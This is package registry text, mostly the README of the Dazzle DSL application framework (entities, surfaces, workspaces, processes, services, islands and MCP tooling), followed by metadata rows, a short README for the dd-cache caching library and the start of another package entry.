- Builds a repository with CRUD operations (create, read, update, delete, list with pagination)

**This is critical to understand:** When your entity says `trading_status: enum[...] = active`, every new Company record gets `trading_status = active` automatically. No process needs to "set" it. No service needs to assign it. The entity layer handles it at creation time.

#### State Machines

Entities can declare allowed transitions between enum values:

```dsl
entity Task "Task":
  id: uuid pk
  title: str(200) required
  status: enum[todo, in_progress, review, done] = todo
  assigned_to: ref User

  transitions:
    todo -> in_progress
    in_progress -> review
    review -> done
    review -> in_progress
    done -> todo: role(admin)
```

This means you cannot set `status` to `done` without going through `review` first, and you cannot reopen a `done` task unless you have the admin role. The entity layer enforces this at the API boundary — no process or service code needed.
State machines also support auto-transitions with time delays:

```dsl
transitions:
  pending -> expired: auto after 30 days
  pending -> active: requires payment_confirmed
```

#### Relationships

Entities link to each other with typed relationships:

```dsl
entity OrderItem "Order Item":
  id: uuid pk
  order: ref Order          # Foreign key
  product: ref Product
  quantity: int required

entity Order "Order":
  id: uuid pk
  customer: ref Customer
  items: has_many OrderItem cascade    # Delete items when order deleted
  shipping_address: embeds Address     # Embedded value object
  invoice: has_one Invoice restrict    # Prevent delete if invoice exists
```

**Relationship types:** `ref` (foreign key), `has_many` (one-to-many with ownership), `has_one` (one-to-one), `belongs_to` (inverse FK), `embeds` (embedded value type)

**Delete behaviors:** `cascade` (delete children), `restrict` (prevent delete), `nullify` (set FK to null), `readonly` (immutable relationship)

#### Invariants

Cross-field business rules that the entity layer enforces:

```dsl
entity Task "Task":
  ...
  invariants:
    urgent_needs_date: "Urgent tasks must have a due date"
      when priority = "urgent" then due_date is not null
      error_code: TASK_URGENT_NO_DATE
```

#### Archetypes

Reusable field templates that entities can inherit:

```dsl
archetype Timestamped:
  created_at: datetime auto_add
  updated_at: datetime auto_update

archetype Auditable extends Timestamped:
  created_by: ref User
  updated_by: ref User

entity Invoice "Invoice":
  extends Auditable
  ...
```

#### Sensitive Fields

Fields containing PII or credentials can be marked `sensitive` for automatic masking and compliance:

```dsl
entity Employee "Employee":
  id: uuid pk
  name: str(200) required
  bank_account: str(8) sensitive
  ni_number: str(9) required sensitive
```

This modifier:

- **Masks values in list views** — displays `****1234` (last 4 characters visible)
- **Excludes from filters** — sensitive fields cannot be used as filter criteria
- **Marks in OpenAPI** — adds `x-sensitive: true` extension to the schema
- **Flags in entity schema** — available for compliance scanning and audit tooling

#### Semantic Metadata

Entities carry metadata that helps both LLMs and Dazzle's tooling understand intent:

```dsl
entity CustomerDueDiligence "Customer Due Diligence":
  intent: "Track KYC/AML verification status for regulatory compliance"
  domain: compliance
  patterns: lifecycle, audit, searchable
  ...
```

### Layer 2: Surfaces (Your UI)

A surface defines how users see and interact with entity data. It maps fields to screens.

```dsl
surface company_list "Companies":
  uses entity Company
  mode: list
  section main:
    field company_name "Name"
    field trading_status "Status"
    field is_vat_registered "VAT Registered"
  ux:
    purpose: "Browse and manage client companies"
    sort: company_name asc
    filter: trading_status, is_vat_registered
    search: company_name, company_number
    empty: "No companies yet. Add your first client!"
```

What Dazzle does with this:

- Registers an HTTP route (`/companies`)
- Renders a DataTable with sortable column headers, filter dropdowns, debounced search, and pagination
- Generates create, edit, detail, and delete surfaces from the same entity
- All interaction is server-rendered HTML with HTMX for partial updates — no JavaScript framework required

The `ux:` block is the semantic layer. It tells Dazzle *what interactive features this table needs*, and the runtime translates that into clickable sort arrows, `<select>` filter dropdowns, and a search input with 300ms debounce.

**Surface modes:** `list` (data table), `view` (detail page), `create` (form), `edit` (form), `custom` (free-form)

#### Attention Signals

Surfaces can declare conditions that should draw user attention:

```dsl
ux:
  attention:
    critical: status = "overdue" -> "This item is overdue"
    warning: due_date < today and status != "done" -> "Approaching deadline"
```

When rows match these conditions, the UI highlights them — red background for critical, yellow for warning — with the message shown as a tooltip. The workspace region renderer evaluates these signals against every row and picks the highest severity.

#### Persona Variants

The same surface can show different fields, scopes, or behaviors to different user roles:

```dsl
ux:
  for admin:
    scope: all
    purpose: "Full company management"
    action_primary: company_create
  for agent:
    scope: assigned_agent = current_user
    purpose: "View assigned companies"
    read_only: true
    hide: internal_notes, margin_percentage
```

### Layer 3: Workspaces (Your Dashboards)

A workspace composes multiple data views into a single dashboard page. Where surfaces show one entity, workspaces aggregate across many.
```dsl
workspace admin_dashboard "Admin Dashboard":
  purpose: "Practice-wide operational visibility"
  stage: "command_center"

  practice_kpis:
    source: Company
    display: metrics
    aggregate:
      total_clients: count(Company)
      active_subscriptions: count(ClientSubscription where status = active)
      overdue_deadlines: count(ComplianceDeadline where due_date < today and status != completed)

  onboarding_pipeline:
    source: OnboardingFlow
    filter: completed_at = null
    sort: started_at asc
    limit: 10
    display: list
    action: onboarding_flow_detail
    empty: "No active onboardings"

  urgent_tasks:
    source: Task
    filter: priority = urgent and status != done
    sort: due_date asc
    limit: 5
    display: list
    action: task_detail
```

Each workspace has **regions** — the named blocks like `practice_kpis` and `onboarding_pipeline`. Regions can be:

- **Data regions** (`display: list`): Show filtered, sorted entity rows — like a mini surface with sortable headers, status badges, filter dropdowns, and row-click navigation
- **Aggregate regions** (`display: metrics`): Show KPI metric cards computed from `count()`, `sum()`, `avg()`, `min()`, `max()` expressions
- **Detail regions** (`display: detail`): Show a single record
- **Grid regions** (`display: grid`): Card-based grid layout

The `stage:` controls the CSS grid layout:

| Stage | Layout | Use Case |
|-------|--------|----------|
| `focus_metric` | Single column, hero stat + supporting | KPI dashboard |
| `scanner_table` | Full-width table + optional sidebar | Data browser |
| `dual_pane_flow` | 2-column master-detail | List + detail |
| `monitor_wall` | 2x2 or 2x3 grid | Status wall |
| `command_center` | 12-column grid with region spans | Operations hub |

At runtime, each region gets its own HTMX endpoint (`/api/workspaces/admin_dashboard/regions/practice_kpis`) that returns rendered HTML fragments. The workspace page loads instantly with skeleton placeholders, then each region fills in asynchronously.
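Conceptually, an aggregate region's expressions reduce to filter-then-fold operations over entity rows. The sketch below is illustrative only, with hypothetical in-memory rows and a toy `count` helper rather than Dazzle's actual query engine:

```python
from datetime import date

# Hypothetical rows standing in for Task entity data; the real runtime
# evaluates aggregate expressions against the database.
tasks = [
    {"status": "done", "due_date": date(2025, 1, 10)},
    {"status": "todo", "due_date": date(2025, 1, 1)},
    {"status": "in_progress", "due_date": date(2025, 2, 1)},
]

def count(rows, predicate=lambda r: True):
    """count(Entity where ...) reduces to filtering, then counting."""
    return sum(1 for r in rows if predicate(r))

# Each entry mirrors one metric card in an `aggregate:` block.
metrics = {
    "total_tasks": count(tasks),
    "open_tasks": count(tasks, lambda r: r["status"] != "done"),
    "overdue": count(
        tasks, lambda r: r["due_date"] < date(2025, 1, 15) and r["status"] != "done"
    ),
}
```

Because the `where` clauses are declarative, the runtime can also translate them into SQL rather than scanning rows in memory.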
Column rendering is type-aware: enum fields render as colored badges, booleans as check/cross icons, dates as relative times ("2 hours ago"), and money fields with currency symbols. Enum and boolean columns automatically get filter dropdowns. State-machine status fields are filterable by their allowed states. ### Layer 4: Stories and Processes (Your Business Logic) This is where Dazzle's architecture gets interesting, and where the layer separation matters most. **Stories** describe *what should happen* from a user's perspective: ```yaml story_id: ST-161 title: "Staff completes onboarding and provisions client access" actor: Agent trigger: form_submitted scope: - OnboardingFlow - OnboardingChecklist - Contact - EngagementLetter - ClientSubscription happy_path_outcome: - "OnboardingChecklist.services_selected = true" - "OnboardingFlow.stage transitions to complete" - "OnboardingFlow.completed_at set to current timestamp" - "Contact.onboarding_complete = true" - "EngagementLetter created in draft status" - "ClientSubscription created for selected service package" side_effects: - "Notification sent to client with portal access details" - "AuditLog entry records onboarding completion" - "Task created for agent to initiate CDD process" ``` **Processes** describe *how* the steps are orchestrated: ```yaml name: staff_onboarding_flow implements: - ST-156 - ST-157 - ST-158 - ST-161 trigger: kind: manual entity_name: OnboardingFlow steps: - name: check_existing_flow kind: service service: OnboardingFlow.check_unique_contact - name: create_flow kind: service service: OnboardingFlow.create_or_update - name: create_checklist kind: service service: OnboardingChecklist.create - name: complete_onboarding kind: service service: OnboardingFlow.complete - name: notify_client kind: service service: Notification.send_portal_access - name: create_cdd_task kind: service service: Task.create_cdd_task - name: log_completion kind: service service: AuditLog.create compensations: - name: 
rollback_subscription service: ClientSubscription.delete - name: rollback_flow service: OnboardingFlow.delete events: on_start: onboarding.staff_initiated on_complete: onboarding.staff_completed ``` **Here is the key insight:** The process defines *step ordering*, *failure recovery* (compensations), and *event emission*. It does NOT specify field values like "set completion_percentage to 100" — those are handled by entity defaults (Layer 1) and service implementations (Layer 5). The process orchestrates *when* things happen; the services know *what* to do. Processes also support: - **Human tasks** — steps that wait for user input before continuing - **Retry policies** — automatic retry with backoff on failure - **Timeout policies** — deadlines for step completion - **Overlap policies** — whether multiple instances can run concurrently - **Compensation** — rollback in reverse order when a step fails (saga pattern) ### Layer 5: Services (Your Custom Code) Dazzle's DSL is deliberately **anti-Turing** — you cannot write arbitrary computation in it. This is a feature, not a limitation. It means the DSL is always analyzable, validatable, and safe. When you need real business logic — VAT calculations, NINO validation, Companies House API calls — you declare a **domain service** in the DSL and implement it in a **stub**: ```dsl service calculate_vat "Calculate VAT": kind: domain_logic input: invoice_id: uuid required country_code: str(2) output: vat_amount: decimal(10,2) breakdown: json guarantees: - "Must not mutate the invoice record" stub: python ``` Dazzle auto-generates a typed Python function signature in `stubs/calculate_vat.py`. You fill in the implementation. The DSL declares the contract (inputs, outputs, guarantees); the stub provides the computation. **Service kinds:** `domain_logic` (pure business rules), `validation` (input checking), `integration` (external API calls), `workflow` (multi-step orchestration) This is also how external APIs are declared. 
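As a rough picture of what the generated stub contract looks like: the sketch below is hypothetical — the actual generated signature, the `VatResult` shape, the flat 20% rate, and the placeholder `net` amount are all assumptions mirroring the DSL example above, not real generated code:

```python
# Hypothetical sketch of a stub like stubs/calculate_vat.py; the real
# generated signature may differ.
from dataclasses import dataclass
from decimal import Decimal
from typing import Any

@dataclass
class VatResult:
    vat_amount: Decimal        # output: decimal(10,2)
    breakdown: dict[str, Any]  # output: json

def calculate_vat(invoice_id: str, country_code: str) -> VatResult:
    """Guarantee from the DSL: must not mutate the invoice record."""
    # Illustrative flat-rate rule; real logic would look up country VAT rules
    # and load the invoice's net amount instead of this placeholder.
    rate = Decimal("0.20") if country_code == "GB" else Decimal("0.00")
    net = Decimal("100.00")  # placeholder: would come from the invoice
    return VatResult(
        vat_amount=(net * rate).quantize(Decimal("0.01")),
        breakdown={"net": str(net), "rate": str(rate)},
    )
```

The point of the pattern: the DSL fixes the typed boundary (inputs, outputs, guarantees), so the stub body is the only place hand-written computation lives.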
Dazzle ships with API packs for Stripe, HMRC, Xero, Companies House, DocuSeal, SumSub, and Ordnance Survey — each pack generates the service DSL and foreign model definitions for you. ### Layer 6: The Public Site Dazzle separates your public marketing site from your application. The site is defined in two files: - **`sitespec.yaml`** — Structure: page routes, navigation, section types, brand configuration - **`copy.md`** — Content: headlines, feature descriptions, testimonials, calls to action At runtime, copy is merged into sitespec sections. This separation means a copywriter can edit `copy.md` without touching the structural layout, and a designer can restructure pages in `sitespec.yaml` without rewriting content. Pages use typed sections (`hero`, `features`, `comparison`, `card_grid`, `trust_bar`, `cta`, `markdown`) that Dazzle renders into themed HTML. Page types include `landing`, `pricing`, `legal` (terms, privacy), and custom pages. The site layer also includes brand configuration (logo, tagline, colors), navigation structure, footer layout, and authentication page styling. ### Layer 7: Experiences (Multi-Step User Flows) Experiences define wizard-like flows that guide users through multiple screens: ```dsl experience client_onboarding "Client Onboarding": start at step welcome step welcome: kind: surface surface onboarding_welcome on continue -> step basics step basics: kind: surface surface onboarding_basics on continue -> step business_type on back -> step welcome step business_type: kind: surface surface onboarding_business_type on continue -> step business_details on back -> step basics step complete: kind: surface surface onboarding_complete ``` Each step references a surface, and transitions are driven by user events (`continue`, `back`, `success`, `failure`). Steps can also be `kind: process` (trigger a backend process) or `kind: integration` (call an external API). 
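The event-driven transitions above amount to a lookup table keyed by (current step, event). A minimal sketch mirroring the `client_onboarding` example — illustrative only, not the Dazzle experience engine:

```python
# Illustrative transition table for the experience example above;
# not the actual Dazzle navigation-state implementation.
TRANSITIONS: dict[tuple[str, str], str] = {
    ("welcome", "continue"): "basics",
    ("basics", "continue"): "business_type",
    ("basics", "back"): "welcome",
    ("business_type", "continue"): "business_details",
    ("business_type", "back"): "basics",
}

def next_step(current: str, event: str) -> str:
    """Resolve the next experience step for a user event."""
    try:
        return TRANSITIONS[(current, event)]
    except KeyError:
        raise ValueError(f"no transition for event {event!r} from step {current!r}")

next_step("welcome", "continue")  # "basics"
```

Because the graph is declared rather than coded, the runtime can validate it statically — e.g. flag steps that are unreachable or have no outgoing transitions.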
The experience layer handles navigation state; the surfaces handle data display; the processes handle data manipulation. ### Layer 8: Islands (Client-Side Interactivity) Dazzle's default UI is fully server-rendered with HTMX. But sometimes you need a chart, a drag-and-drop board, or a real-time widget that genuinely requires client-side JavaScript. That is what **islands** are for — self-contained interactive components embedded within server-rendered pages. ```dsl island task_chart "Task Progress Chart": entity: Task src: "islands/task-chart/index.js" fallback: "Loading task chart..." prop chart_type: str = "bar" prop date_range: str = "30d" event chart_clicked: detail: [task_id, series] ``` What Dazzle does with this: - **Renders a container** in the page with server-side fallback content shown before JS loads - **Loads the JS entry point** from `src` (defaults to `/static/islands/{name}/index.js`) - **Passes typed props** as `data-island-props` JSON attributes - **Auto-generates a data endpoint** at `/api/islands/{island_name}/data` when `entity:` is declared, proxying to the entity's CRUD service with pagination Islands are intentionally opt-in and isolated. The server-rendered HTMX approach handles 90%+ of UI needs; islands handle the remaining cases where client-side rendering adds genuine value (charts, maps, rich editors, real-time dashboards). **Props**: Typed key-value pairs passed to the island (`str`, `int`, `bool`, `float` with optional defaults) **Events**: CustomEvent schemas the island may emit, with typed detail fields. The server can listen for these via HTMX's `hx-on` or standard `addEventListener`. --- ## How the Layers Work Together Here is a concrete example: a staff member onboards a new limited company client. 1. **Entity layer**: Company has `trading_status = active` as default. OnboardingFlow has `stage = started` and `flow_type = self_service` as defaults. 2. 
**Experience layer**: The onboarding experience defines the step sequence — welcome → basics → business type → business details → complete. 3. **Surface layer**: Each experience step renders a surface. The `company_create` surface shows a form with company_name and company_number fields. The `ux:` block adds search and validation. 4. **Process layer**: The `staff_onboarding_flow` process orchestrates the multi-entity operations — create OnboardingFlow, create OnboardingChecklist, create Company, create CompanyContact link, create EngagementLetter, create ClientSubscription. If any step fails, compensations roll back in reverse order. 5. **Service layer**: Each process step calls a service. `OnboardingFlow.complete` sets completed_at, updates completion_percentage, marks Contact.onboarding_complete. `Notification.send_portal_access` sends the welcome email. 6. **Workspace layer**: After onboarding, the admin_dashboard workspace shows updated metrics — `total_clients` count increments, the `onboarding_pipeline` region drops the completed flow. 7. **Site layer**: Meanwhile, the public site at `/pricing` shows the service packages available for new clients, driven entirely by sitespec.yaml + copy.md. 8. **Island layer**: A chart on the admin dashboard shows onboarding completion rates over time — rendered client-side with Chart.js, fed by an auto-generated data endpoint. Each layer does one thing well and delegates everything else: | If you need... | You write... | You DON'T write... 
| |---|---|---| | A data model with defaults | Entity DSL | Migration scripts, ORM models | | A CRUD interface | Surface DSL | HTML templates, API routes, pagination logic | | A dashboard | Workspace DSL | Dashboard components, data-fetching hooks | | Business workflow | Process definition | Saga coordinators, event handlers | | Custom logic | Service stub | Framework boilerplate, dependency injection | | A marketing site | sitespec.yaml + copy.md | Landing page HTML, CSS, routing | | A multi-step wizard | Experience DSL | Router configuration, step state management | | A chart or rich widget | Island DSL + JS file | Data-fetching boilerplate, container plumbing | --- ## The Pipeline: Determinism and Cognition DAZZLE separates work into two distinct phases: a **deterministic foundation** that requires zero LLM involvement, and a **cognitive layer** where LLM creativity adds value. ``` ┌─────────────────────────────────────────────────────────────────────────────────┐ │ DETERMINISTIC PHASE (no LLM) │ ├─────────────────────────────────────────────────────────────────────────────────┤ │ │ │ ┌───────────┐ ┌────────────┐ ┌───────────┐ ┌─────────────────┐ │ │ │ DSL Files │ ───▶ │ Parser │ ───▶ │ AppSpec │ ───▶ │ Runtime / Specs │ │ │ │ (.dsl) │ │ + Linker │ │ (IR) │ │ │ │ │ └───────────┘ └────────────┘ └───────────┘ └─────────────────┘ │ │ │ │ │ │ │ │ ▼ ▼ ▼ ▼ │ │ Artifacts: Artifacts: Artifacts: Artifacts: │ │ • core.dsl • AST • Entity graph • OpenAPI spec │ │ • ui.dsl • Symbol table • Surface defs • AsyncAPI spec │ │ • *.dsl • Module graph • Type catalog • Running app │ │ • Validation • HTML templates │ │ │ └─────────────────────────────────────────────────────────────────────────────────┘ │ ▼ ┌─────────────────────────────────────────────────────────────────────────────────┐ │ COGNITIVE PHASE (LLM-assisted) │ ├─────────────────────────────────────────────────────────────────────────────────┤ │ │ │ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────────────────┐ 
│ │ │ Story Proposal │ │ Test Design │ │ Process Orchestration │ │ │ │ │ │ │ │ │ │ │ │ "User creates │ │ Persona-based │ │ Multi-step workflows │ │ │ │ a task and │ │ test coverage │ │ with compensations │ │ │ │ assigns it" │ │ proposals │ │ │ │ │ └─────────────────┘ └─────────────────┘ └─────────────────────────────┘ │ │ │ │ │ │ │ ▼ ▼ ▼ │ │ Artifacts: Artifacts: Artifacts: │ │ • stories.yaml • test_designs.yaml • processes.yaml │ │ • CRUD coverage • Playwright tests • State diagrams │ │ • Edge cases • E2E scenarios • Saga definitions │ │ │ │ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────────────────┐ │ │ │ Demo Data │ │ Tenancy & │ │ Fidelity & Gap Analysis │ │ │ │ │ │ Compliance │ │ │ │ │ │ Realistic │ │ Inference │ │ Spec vs. rendered HTML │ │ │ │ seed data │ │ │ │ cross-tool issue reports │ │ │ │ per-persona │ │ │ │ │ │ │ └─────────────────┘ └─────────────────┘ └─────────────────────────────┘ │ │ │ │ │ │ │ ▼ ▼ ▼ │ │ Artifacts: Artifacts: Artifacts: │ │ • demo_blueprint.yaml • Tenancy config • Fidelity scores │ │ • CSV/JSONL exports • PII/GDPR hints • Unified issues │ │ • Tenant fixtures • Compliance frameworks • Coverage gaps │ │ │ └─────────────────────────────────────────────────────────────────────────────────┘ ``` | Phase | Characteristics | Token Cost | Error Rate | |-------|----------------|------------|------------| | **Deterministic** | Parsing, linking, validation, runtime execution | Zero | Near-zero (compiler-checked) | | **Cognitive** | Story generation, test proposals, gap analysis | One-time per feature | Reviewable artifacts | The deterministic phase handles all the mechanical work that LLMs do poorly: parsing grammars, resolving references, type checking, and generating correct code. The cognitive phase leverages what LLMs do well: understanding intent, proposing test scenarios, and identifying gaps. 
--- ## DSL Constructs Reference Complete reference: [docs/reference/](docs/reference/) ### Core | Construct | Purpose | |-----------|---------| | `module` | Namespace declaration for DSL files | | `app` | Application metadata | | `use` | Import constructs from other modules | ### Data Modeling | Construct | Purpose | |-----------|---------| | `entity` | Domain models with typed fields, relationships, state machines, invariants, and access control | | `enum` | Shared enum definitions reusable across entities (e.g., `OrderStatus` with labeled values) | | `archetype` | Reusable field templates (e.g., `Timestamped`, `Auditable`) | | `foreign_model` | External API data structures (read-only, event-driven, or batch-imported) | **Field Types**: `str(N)`, `text`, `int`, `decimal(P,S)`, `bool`, `date`, `datetime`, `uuid`, `email`, `json`, `money`, `file`, `url`, `timezone`, `enum[...]` **Relationship Types**: `ref`, `has_many`, `has_one`, `belongs_to`, `embeds` **Field Modifiers**: `required`, `optional`, `pk`, `unique`, `unique?`, `auto_add`, `auto_update`, `sensitive`, `=default` **Entity Blocks**: `transitions` (state machine), `invariants` (business rules), `access` (role/owner/tenant permissions), `computed` (derived fields), `examples` (fixture data), `publishes` (event declarations) ### UI Layer | Construct | Purpose | |-----------|---------| | `surface` | UI screens and forms (list, view, create, edit, custom modes) | | `workspace` | Dashboards with regions, filters, aggregates, and layout stages | | `experience` | Multi-step wizards and user flows | | `island` | Client-side interactive components (charts, maps, rich editors) with typed props, events, and optional entity data binding | | `view` | Read-only projections with grouping and aggregates (`sum`, `count`, `avg`) for dashboards and reports | **Surface Elements**: `section`, `field`, `action`, `outcome` **Workspace Elements**: `source`, `filter`, `sort`, `limit`, `display`, `aggregate`, `group_by`, `action` 
**Workspace Stages**: `focus_metric`, `scanner_table`, `dual_pane_flow`, `monitor_wall`, `command_center` **Experience Steps**: `kind: surface`, `kind: process`, `kind: integration` with event-driven transitions ### UX Semantic Layer | Construct | Purpose | |-----------|---------| | `ux` | UI hints block within surfaces | | `attention` | Conditional alerts (critical, warning, notice, info) | | `for` | Persona-specific view customization (scope, show/hide, read_only, defaults) | **UX Properties**: `purpose`, `show`, `hide`, `sort`, `filter`, `search`, `empty` ### Services and Integrations | Construct | Purpose | |-----------|---------| | `service` | External APIs (with OpenAPI spec) or domain services (with typed input/output/guarantees) | | `integration` | Orchestrates data flow between app and external services | **Service Kinds**: `domain_logic`, `validation`, `integration`, `workflow` **Integration Elements**: `action` (request-response), `sync` (scheduled or event-driven data synchronization) ### Messaging | Construct | Purpose | |-----------|---------| | `message` | Typed message schemas | | `channel` | Communication pathways (email, queue, stream) | | `template` | Reusable message templates with attachments | **Send Triggers**: Entity events, status transitions, field changes, service events, schedules ### Ledgers and Transactions | Construct | Purpose | |-----------|---------| | `ledger` | TigerBeetle account templates for double-entry accounting | | `transaction` | Multi-leg financial transactions with atomic guarantees | ```dsl ledger CustomerWallet "Customer Wallet": account_code: 1001 ledger_id: 1 account_type: asset currency: GBP flags: debits_must_not_exceed_credits sync_to: Customer.balance_cache transaction RecordPayment "Record Payment": execution: async priority: high transfer revenue: debit: CustomerWallet credit: Revenue amount: payment.amount code: 1 flags: linked idempotency_key: payment.id ``` **Account Types**: `asset`, `liability`, `equity`, 
`revenue`, `expense` ### Governance and Automation | Construct | Purpose | |-----------|---------| | `webhook` | Outbound HTTP notifications on entity events with HMAC/bearer/basic auth and retry policies | | `approval` | Approval gates with quorum, threshold conditions, time-based escalation, and auto-approve rules | | `sla` | Service level agreements with deadline tiers, business hours, pause conditions, and breach actions | ### Personas and Scenarios | Construct | Purpose | |-----------|---------| | `persona` | User archetypes with goals, proficiency levels, default workspaces | | `scenario` | Named application states for development and demos | ```dsl persona admin "Administrator": description: "Full system access for practice management" goals: manage_clients, monitor_compliance, configure_system proficiency: expert default_workspace: admin_dashboard scenario busy_sprint "Busy Sprint": seed_script: fixtures/busy_sprint.json for admin: description: "20 active tasks, 3 overdue, 2 in review" for member: description: "5 assigned tasks, 1 overdue" ``` ### Events and Streams | Construct | Purpose | |-----------|---------| | `publishes` | Event declarations on entities (lifecycle, field changes) | | `subscribe` | Event handlers and projections | | `stream` | HLESS (High-Level Event Semantics) with INTENT/FACT/OBSERVATION/DERIVATION records | --- ## The MCP Tooling Pipeline Dazzle is not just a runtime — it is also an AI-assisted development environment accessed through MCP (Model Context Protocol) tools. When you use Claude Code with a Dazzle project, you get access to **26 tools with 170+ operations** spanning every stage from natural-language spec to visual regression testing. ### 1. Spec to DSL Turn a plain-English idea into validated DSL. 
`bootstrap` is the entry point for "build me an app" requests; `spec_analyze` breaks a narrative into entities, lifecycles, personas, and business rules; `dsl` validates and inspects the result; `api_pack` wires in external APIs. | Tool | Operations | Purpose | |------|-----------|---------| | `bootstrap` | (single operation) | Entry point — scans for spec files, runs cognition pass, returns a mission briefing | | `spec_analyze` | discover_entities, identify_lifecycles, extract_personas, surface_rules, generate_questions, refine_spec | Analyze natural-language specs before DSL generation | | `dsl` | validate, lint, inspect_entity, inspect_surface, analyze, list_modules, get_spec, fidelity, list_fragments, export_frontend_spec | Parse, validate, inspect, and score DSL files | | `api_pack` | list, search, get, generate_dsl, env_vars, infrastructure | External API integration packs with infra manifests | ### 2. Test and Verify Generate stories, design tests, execute them at three tiers, and seed realistic demo data — all from the DSL. | Tool | Operations | Purpose | |------|-----------|---------| | `story` | propose, save, get, generate_tests, coverage | Generate and manage user stories; `get` with `view=wall` shows a founder-friendly board grouped by implementation status | | `test_design` | propose_persona, gaps, save, get, coverage_actions, runtime_gaps, save_runtime, auto_populate, improve_coverage | Persona-centric test design with autonomous gap-filling | | `dsl_test` | generate, run, run_all, coverage, list, create_sessions, diff_personas, verify_story | API tests — including `verify_story` (check story implementations) and `diff_personas` (compare route behavior across roles) | | `e2e_test` | check_infra, run, run_agent, coverage, list_flows, tier_guidance, run_viewport, list_viewport_specs, save_viewport_specs | Browser E2E with Playwright — viewport testing
text/markdown
DAZZLE Contributors
null
DAZZLE Contributors
null
MIT
dsl, code-generation, openapi, llm, domain-modeling, application-generator
[ "Development Status :: 3 - Alpha", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Programming Language :: Python :: 3", "Programming Language :: Python :: 3.12", "Topic :: Software Development :: Code Generators", "Topic :: Software Development :: Compilers", "Typing :: ...
[]
null
null
>=3.12
[]
[]
[]
[ "pydantic>=2.0", "typer>=0.9", "jinja2>=3.1", "pyyaml>=6.0", "markdown>=3.5", "psycopg[binary]>=3.2", "psycopg-pool>=3.2", "sqlalchemy>=2.0", "alembic>=1.14", "anthropic>=0.21.0; extra == \"llm\"", "openai>=1.0.0; extra == \"llm\"", "mcp>=1.0.0; extra == \"mcp\"", "pygls>=1.0.0; extra == \"l...
[]
[]
[]
[ "Homepage, https://github.com/manwithacat/dazzle", "Documentation, https://github.com/manwithacat/dazzle/blob/main/docs", "Repository, https://github.com/manwithacat/dazzle", "Issues, https://github.com/manwithacat/dazzle/issues", "Changelog, https://github.com/manwithacat/dazzle/blob/main/CHANGELOG.md" ]
twine/6.1.0 CPython/3.13.7
2026-02-19T22:00:38.269064
dazzle_dsl-0.33.1.tar.gz
2,113,080
aa/6a/271a8e1737d6de2b36b59006e128d67ba7868af81ce15037a699bfa59a90/dazzle_dsl-0.33.1.tar.gz
source
sdist
null
false
73653ba57a03ef30af8fef4eee66291d
4c193b2d8aa6f23d2d36788e3e5ae929011ab5e864cbbdb1b14ffc7a81df645e
aa6a271a8e1737d6de2b36b59006e128d67ba7868af81ce15037a699bfa59a90
null
[ "LICENSE" ]
213
2.4
dd-cache
0.1.0
Backend-swappable caching layer for the dd-* ecosystem
# dd-cache Backend-swappable caching layer for the dd-* ecosystem. ## Install ```bash pip install -e . # core (memory + disk) pip install -e ".[redis]" # add Redis support pip install -e ".[dev]" # + pytest ``` ## Quick start ```python from dd_cache import InMemoryCache, DiskCache # In-process, TTL-aware with InMemoryCache() as cache: cache.set("key", {"data": 42}, ttl=60) value = cache.get("key") # Persistent SQLite with DiskCache(".cache/myapp.db") as cache: result = cache.get_or_set("expensive_key", lambda: run_expensive_query()) ``` ## Adapters | Class | Backend | Persistence | TTL | Extra deps | |-----------------|-----------|-------------|---------|------------| | `InMemoryCache` | dict | process | lazy | none | | `DiskCache` | SQLite | file | lazy | none | | `RedisCache` | Redis | server | native | `redis` | ## API ```python cache.get(key) # → Any | None cache.set(key, value, ttl=None) # ttl in seconds cache.delete(key) # → bool cache.exists(key) # → bool cache.clear() cache.stats() # → CacheStats cache.get_or_set(key, fn, ttl=None) ``` See `docs/DESIGN.md` for architecture details.
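For intuition, the lazy-TTL semantics described above can be sketched in a few lines. `TinyCache` is an illustrative stand-in, not the real `InMemoryCache` (and, unlike the real adapter, it cannot distinguish a cached `None` from a miss):

```python
# Illustrative sketch of lazy-TTL get/set/get_or_set semantics;
# use dd_cache.InMemoryCache for real work.
import time
from typing import Any, Callable, Optional

class TinyCache:
    def __init__(self) -> None:
        self._data: dict[str, tuple[Any, Optional[float]]] = {}

    def set(self, key: str, value: Any, ttl: Optional[int] = None) -> None:
        expires = time.monotonic() + ttl if ttl is not None else None
        self._data[key] = (value, expires)

    def get(self, key: str) -> Any:
        item = self._data.get(key)
        if item is None:
            return None
        value, expires = item
        if expires is not None and time.monotonic() >= expires:
            del self._data[key]  # lazy expiry: evict on read, not on a timer
            return None
        return value

    def get_or_set(self, key: str, fn: Callable[[], Any],
                   ttl: Optional[int] = None) -> Any:
        value = self.get(key)
        if value is None:
            value = fn()  # compute once, then serve from cache
            self.set(key, value, ttl)
        return value
```

"Lazy" TTL means expired entries linger until the next read touches them — the trade-off the adapter table above marks for the memory and disk backends, versus Redis's native server-side expiry.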
text/markdown
null
null
null
null
null
null
[]
[]
null
null
>=3.9
[]
[]
[]
[ "pydantic>=2.0.0", "redis>=4.0; extra == \"redis\"", "redis>=4.0; extra == \"all\"", "pytest>=7.0; extra == \"dev\"", "pytest-cov; extra == \"dev\"", "redis>=4.0; extra == \"dev\"" ]
[]
[]
[]
[]
twine/6.2.0 CPython/3.11.5
2026-02-19T22:00:35.266843
dd_cache-0.1.0.tar.gz
7,527
ae/c5/881ceea06b2efd2e421de4a7988e822d815bd826bde810e4968e1c13484d/dd_cache-0.1.0.tar.gz
source
sdist
null
false
105c15ae1817f0ddcdc99e61677965c5
91691330dee2b082ebe95fe68aa0d019c9a218d47d9e7c0fe02204956da77da2
aec5881ceea06b2efd2e421de4a7988e822d815bd826bde810e4968e1c13484d
MIT
[ "LICENSE" ]
226
2.4
keeps-learn-nexus-proto
0.11.0
Shared Protocol Buffer definitions for Nexus microservices
